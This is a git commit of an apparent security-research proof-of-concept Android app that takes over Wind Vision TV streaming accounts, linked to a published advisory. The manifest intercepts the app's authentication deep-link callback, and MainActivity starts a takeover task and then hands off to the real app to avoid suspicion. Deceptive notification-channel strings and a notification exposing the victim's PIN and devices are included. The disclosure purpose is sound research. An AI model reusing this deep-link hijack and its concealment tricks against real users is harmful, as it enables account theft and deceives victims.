First commit for the FSGH remote

.gitignore

@@ -0,0 +1,3 @@
+.idea/
+gradle
+.gradle

README.md

@@ -0,0 +1,16 @@
+# <img src="app/src/main/res/mipmap-hdpi/ic_launcher.png">Wind Vision Account Takeover
+
+A PoC Android application that exploits 4 vulnerabilities of the Wind Vision TV streaming application to achieve account takeover. 
+
+For more information see the relevant [Advisory](https://labs.f-secure.com/advisories/wind-vision) and the [Blog Post](https://labs.f-secure.com/blog/wind-vision-writeup).
+
+
+
+## Instructions
+
+A debug APK has been compiled can be found here: [demo-app.apk](demo-app.apk). Alternatively, clone the project and import it in Android Studio where it should be ready to be compiled. 
+
+An example run when installed alongside the legitimate Wind Vision application is depicted below. Note that this application will not harm your account or device in any way and is purely provided for demonstration purposes. 
+
+<video src="demo-poc.mp4"></video>
+

app/.gitignore

@@ -0,0 +1 @@
+/build

app/build.gradle

@@ -0,0 +1,31 @@
+apply plugin: 'com.android.application'
+
+android {
+    compileSdkVersion 29
+    buildToolsVersion "29.0.2"
+    defaultConfig {
+        applicationId 'com.fsecure.deeplinkabuser'
+        minSdkVersion 26
+        targetSdkVersion 29
+        versionCode 1
+        versionName "1.0"
+        testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
+    }
+    buildTypes {
+        release {
+            minifyEnabled false
+            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
+        }
+    }
+}
+
+dependencies {
+    implementation fileTree(dir: 'libs', include: ['*.jar'])
+    implementation 'com.squareup.okhttp3:okhttp:4.9.0'
+    implementation 'androidx.appcompat:appcompat:1.0.2'
+    implementation 'androidx.constraintlayout:constraintlayout:1.1.3'
+    implementation 'com.google.android.material:material:1.0.0'
+    testImplementation 'junit:junit:4.12'
+    androidTestImplementation 'androidx.test:runner:1.1.1'
+    androidTestImplementation 'androidx.test.espresso:espresso-core:3.1.1'
+}

app/proguard-rules.pro

@@ -0,0 +1,21 @@
+# Add project specific ProGuard rules here.
+# You can control the set of applied configuration files using the
+# proguardFiles setting in build.gradle.
+#
+# For more details, see
+#   http://developer.android.com/guide/developing/tools/proguard.html
+
+# If your project uses WebView with JS, uncomment the following
+# and specify the fully qualified class name to the JavaScript interface
+# class:
+#-keepclassmembers class fqcn.of.javascript.interface.for.webview {
+#   public *;
+#}
+
+# Uncomment this to preserve the line number information for
+# debugging stack traces.
+#-keepattributes SourceFile,LineNumberTable
+
+# If you keep the line number information, uncomment this to
+# hide the original source file name.
+#-renamesourcefileattribute SourceFile

app/src/main/AndroidManifest.xml

@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    xmlns:tools="http://schemas.android.com/tools"
+    package="com.fsecure.deeplinkabuser">
+
+    <uses-permission android:name="android.permission.INTERNET"/>
+
+    <application
+        android:allowBackup="true"
+        android:icon="@mipmap/ic_launcher"
+        android:label="@string/app_name"
+        android:supportsRtl="true"
+        android:theme="@style/AppTheme"
+        tools:ignore="GoogleAppIndexingWarning">
+
+        <activity
+            android:name=".MainActivity"
+            android:label="@string/title_activity_main"
+            android:theme="@style/AppTheme.NoActionBar">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+            <intent-filter>
+                <action android:name="android.intent.action.VIEW" />
+                <category android:name="android.intent.category.DEFAULT" />
+                <category android:name="android.intent.category.BROWSABLE" />
+                <data
+                    android:host="pridp.wind.gr"
+                    android:path="/AuthCallback"
+                    android:scheme="nexx4" />
+
+            </intent-filter>
+        </activity>
+    </application>
+
+</manifest>

app/src/main/java/com/fsecure/deeplinkabuser/HackedInfo.java

@@ -0,0 +1,24 @@
+package com.fsecure.deeplinkabuser;
+
+import java.util.ArrayList;
+
+public class HackedInfo {
+    public String pinCode;
+    public ArrayList<String> devices;
+
+    public String getPinCode() {
+        return pinCode;
+    }
+
+    public void setPinCode(String pinCode) {
+        this.pinCode = pinCode;
+    }
+
+    public ArrayList<String> getDevices() {
+        return devices;
+    }
+
+    public void setDevices(ArrayList<String> devices) {
+        this.devices = devices;
+    }
+}

app/src/main/java/com/fsecure/deeplinkabuser/MainActivity.java

@@ -0,0 +1,62 @@
+package com.fsecure.deeplinkabuser;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.media.MediaDrm;
+import android.media.UnsupportedSchemeException;
+import android.net.Uri;
+import android.os.Bundle;
+import android.util.Base64;
+import android.util.Log;
+
+import androidx.appcompat.app.AppCompatActivity;
+
+import org.json.JSONArray;
+import org.json.JSONObject;
+
+import java.util.ArrayList;
+import java.util.UUID;
+
+import okhttp3.MediaType;
+import okhttp3.MultipartBody;
+import okhttp3.OkHttpClient;
+import okhttp3.Request;
+import okhttp3.RequestBody;
+import okhttp3.Response;
+
+public class MainActivity extends AppCompatActivity {
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        super.onCreate(savedInstanceState);
+        setContentView(R.layout.activity_main);
+
+        NotificationUtils.createNotificationChannel(this);
+    }
+
+
+    @Override
+    protected void onResume() {
+        super.onResume();
+
+        Uri uri = getIntent().getData();
+        if (uri != null && uri.getScheme() != null && uri.getScheme().equals("nexx4")) {
+            new TakeoverTask(this).execute(uri);
+        }
+        // else/finally: immediately exit to real app - hiding our true self, not raising any suspicions
+        callRealApp(this);
+
+    }
+
+
+    public static void callRealApp(Context context) {
+        Intent launchIntent = context.getPackageManager().getLaunchIntentForPackage("gr.wind.windvision");
+        if (launchIntent != null) {
+            context.startActivity(launchIntent);//null pointer check in case package name was not found
+        }
+
+    }
+
+}

app/src/main/java/com/fsecure/deeplinkabuser/NotificationUtils.java

@@ -0,0 +1,47 @@
+package com.fsecure.deeplinkabuser;
+
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.content.Context;
+import android.os.Build;
+
+import androidx.core.app.NotificationCompat;
+import androidx.core.app.NotificationManagerCompat;
+
+public class NotificationUtils {
+    public static void createNotificationChannel(Context context) {
+        // Create the NotificationChannel, but only on API 26+ because
+        // the NotificationChannel class is new and not in the support library
+        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
+            CharSequence name = "Updates";                                                             // some more deceiving strings, as they would appear in the Notification Settings
+            String description = "Wind Vision account updates";
+            int importance = NotificationManager.IMPORTANCE_HIGH;
+            NotificationChannel channel = new NotificationChannel("Updates", name, importance);
+            channel.setDescription(description);
+            // Register the channel with the system; you can't change the importance
+            // or other notification behaviors after this
+            NotificationManager notificationManager = context.getSystemService(NotificationManager.class);
+            notificationManager.createNotificationChannel(channel);
+        }
+    }
+
+
+    public static void createHackNotification(Context context, HackedInfo hackedInfo) {
+        String notificationText = "Your app PIN code is: " + hackedInfo.getPinCode();
+        for (int i = 0; i < 4; i++) {
+            notificationText += "\n\tdevice seen: " + hackedInfo.getDevices().get(i);
+        }
+
+        NotificationCompat.Builder builder = new NotificationCompat.Builder(context, "Updates")
+                .setSmallIcon(R.mipmap.ic_launcher)
+                .setContentTitle("Your Wind Vision Account Has Been Hacked!")
+                .setStyle(new NotificationCompat.BigTextStyle().bigText(notificationText))
+                .setPriority(NotificationCompat.PRIORITY_MAX)
+                .setFullScreenIntent(null,true);
+
+        NotificationManagerCompat notificationManager = NotificationManagerCompat.from(context);
+
+        // notificationId is a unique int for each notification that you must define
+        notificationManager.notify(99, builder.build());
+    }
+}